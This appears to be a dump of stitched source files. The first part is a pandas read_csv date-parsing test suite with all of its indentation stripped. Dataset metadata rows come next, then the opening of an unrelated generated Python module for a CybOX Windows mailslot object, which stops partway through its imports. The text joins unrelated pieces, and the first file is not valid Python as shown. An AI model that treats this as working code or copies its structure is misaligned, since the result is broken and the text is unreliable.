KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
prefix="X", parse_dates=[[1, 2], [1, 3]],
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, prefix="X",
parse_dates=[1], index_col=1)
index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
datetime(1999, 1, 27, 22, 0)], name="X1")
expected = DataFrame([
["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900")
parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
date_parser=conv.parse_date_time,
parse_dates=parse_dates, prefix="X")
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59],
], columns=["actual", "nominal", "X0", "X4"])
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
parser = all_parsers
data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
header=None, date_parser=Timestamp)
expected = DataFrame([
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 1, "E", 0, np.nan, 1306.25],
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 8, "E", 0, np.nan, 1306.25]
], columns=["0_1", 2, 3, 4, 5, 6, 7])
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
parser = all_parsers
data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
"in dict date_NominalTime")),
("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
parser = all_parsers
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
parser = all_parsers
data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
"accountid,userid,contactid,level,silo,method\n"
"1343103150,0.062353,0,4,6,0.01690,3,"
"12345,1,-1,3,invoice_InvoiceResource,search\n")
result = parser.read_csv(
StringIO(data), index_col=0, parse_dates=[0],
date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
3, "invoice_InvoiceResource", "search"]],
columns=["elapsed", "sys", "user", "queries",
"query_time", "rows", "accountid",
"userid", "contactid", "level",
"silo", "method"],
index=Index([Timestamp("2012-07-24 04:12:30")],
name="posix_timestamp"))
tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
parser = all_parsers
df = DataFrame(dict({"A": np.asarray(lrange(10), dtype="float64"),
"B": pd.Timestamp("20010101")}))
df.iloc[3:6, :] = np.nan
with tm.ensure_clean("__nat_parse_.csv") as path:
df.to_csv(path)
result = parser.read_csv(path, index_col=0, parse_dates=["B"])
tm.assert_frame_equal(result, df)
def test_csv_custom_parser(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(
StringIO(data),
date_parser=lambda x: datetime.strptime(x, "%Y%m%d"))
expected = parser.read_csv(StringIO(data), parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=True)
expected = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col="date",
parse_dates=["date"])
index = date_range("1/1/2009", periods=3)
index.name = "date"
expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
"C": [2, 4, 5]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
[["date", "time"]],
[[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=parse_dates)
index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
datetime(2009, 2, 28, 10, 20, 0),
datetime(2009, 3, 31, 8, 30, 0)],
dtype=object, name="date_time")
expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
data = "a,b,c\n01/01/2010,1,15/02/2010"
parser = all_parsers
expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
"c": [datetime(2010, 2, 15)]})
expected = expected.set_index(["a", "b"])
result = parser.read_csv(StringIO(data), index_col=[0, 1],
parse_dates=parse_dates, dayfirst=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
parser = all_parsers
index = MultiIndex.from_product([
(datetime(2009, 1, 1), datetime(2009, 1, 2),
datetime(2009, 1, 3)), ("one", "two", "three")],
names=["index1", "index2"])
# Out of order.
if index_col == [1, 0]:
index = index.swaplevel(0, 1)
expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
columns=["A", "B", "C"], index=index)
result = parser.read_csv(StringIO(data), index_col=index_col,
parse_dates=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
parser = all_parsers
data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
if "dayfirst" in kwargs:
df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
header=0, index_col=0, parse_dates=True,
na_values=["NA"])
exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
datetime(2010, 2, 2)], name="time")
expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
index=exp_index, columns=["Q", "NTU"])
tm.assert_frame_equal(df, expected)
else:
msg = "got an unexpected keyword argument 'day_first'"
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
skiprows=[0], index_col=0, parse_dates=True,
na_values=["NA"])
def test_parse_tz_aware(all_parsers):
# See gh-1693
parser = all_parsers
data = "Date,x\n2012-06-13T01:39:00Z,0.5"
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
expected = DataFrame({"x": [0.5]}, index=Index([Timestamp(
"2012-06-13 01:39:00+00:00")], name="Date"))
tm.assert_frame_equal(result, expected)
assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
({"nominal": [1, 2]}, "nominal"),
({"nominal": [1, 2]}, 0),
([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
parser = all_parsers
data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
expected = expected.set_index("nominal")
if not isinstance(parse_dates, dict):
expected.index.name = "date_NominalTime"
result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
index_col=index_col)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
expected = expected.set_index("nominal")
reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
index_col="nominal", chunksize=2)
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
with_indices = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]},
index_col="nominal")
with_names = parser.read_csv(StringIO(data), index_col="nominal",
parse_dates={"nominal": [
"date", "nominalTime"]})
tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
parse_dates={"nominal": [1, 2]})
expected = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]})
expected = expected.set_index(["nominal", "ID"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
# see gh-5636
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
(1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates=(1,))
def test_parse_dates_empty_string(all_parsers):
# see gh-2263
parser = all_parsers
data = "Date,test\n2012-01-01,1\n,2"
result = parser.read_csv(StringIO(data), parse_dates=["Date"],
na_filter=False)
expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
columns=["Date", "test"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("a\n04.15.2016", dict(parse_dates=["a"]),
DataFrame([datetime(2016, 4, 15)], columns=["a"])),
("a\n04.15.2016", dict(parse_dates=True, index_col=0),
DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
columns=["a", "b"])),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
DataFrame(index=MultiIndex.from_tuples(
[(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
# see gh-14066
parser = all_parsers
result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=[0, 1],
parse_dates={"date_time": [0, 1]},
date_parser=conv.parse_date_time)
expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
[datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
expected = DataFrame(expected_data,
columns=["date_time", ("A", "a"), ("B", "b")])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
[datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
columns=["date_time", "a", "b"])),
(("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
**kwargs)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
parser = all_parsers
data = ("year,month,day,a\n2001,01,10,10.\n"
"2001,02,1,11.")
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ymd": [0, 1, 2]},
date_parser=conv.parse_date_fields)
expected = DataFrame([[datetime(2001, 1, 10), 10.],
[datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
microsecond=123456), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0,
microsecond=500000), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
parser = all_parsers
data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ym": [0, 1]},
date_parser=lambda y, m: date(year=int(y),
month=int(m),
day=1))
expected = DataFrame([[date(2001, 1, 1), 10, 10.],
[date(2001, 2, 1), 1, 11.]],
columns=["ym", "day", "a"])
tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
# see gh-10245
parser = all_parsers
data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
def date_parser(dt, time):
return np_array_datetime64_compat(dt + "T" + time + "Z",
dtype="datetime64[s]")
result = parser.read_csv(StringIO(data), date_parser=date_parser,
parse_dates={"datetime": ["date", "time"]},
index_col=["datetime", "prn"])
datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
dtype="datetime64[s]")
expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
index=MultiIndex.from_tuples(
[(datetimes[0], 126), (datetimes[1], 23),
(datetimes[2], 13)], names=["datetime", "prn"]))
tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
# see gh-6428
parser = all_parsers
data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
expected_data = [[7, "10/18/2006"],
[7, "10/18/2008"],
[621, " "]]
expected = DataFrame(expected_data, columns=["case", "opdate"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
("a\n135217135789158401\n1352171357E+5",
DataFrame({"a": [135217135789158401,
135217135700000]}, dtype="float64")),
("a\n99999999999\n123456789012345\n1234E+0",
DataFrame({"a": [99999999999,
123456789012345,
1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
# see gh-2697
#
# Date parsing should fail, so we leave the data untouched
# (i.e. float precision should remain unchanged).
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
# see gh-22256
parser = all_parsers
data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
result = parser.read_csv(StringIO(data), parse_dates=["dt"])
dti = pd.date_range(start="2018-01-04 09:01:00",
end="2018-01-04 09:05:00", freq="1min",
tz=pytz.FixedOffset(540))
expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
expected = DataFrame(expected_data)
tm.assert_frame_equal(result, expected)
| true
| true
|
f71904faf2288daafe85d61933530d6aa3302b20
| 22,091
|
py
|
Python
|
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | 1
|
2015-11-08T16:06:03.000Z
|
2015-11-08T16:06:03.000Z
|
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Apr 10 13:54:57 2012 by generateDS.py version 2.7b.
#
import sys
import getopt
import re as re_
import common_types_1_0 as common
import win_handle_object_1_2 as win_handle_object
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
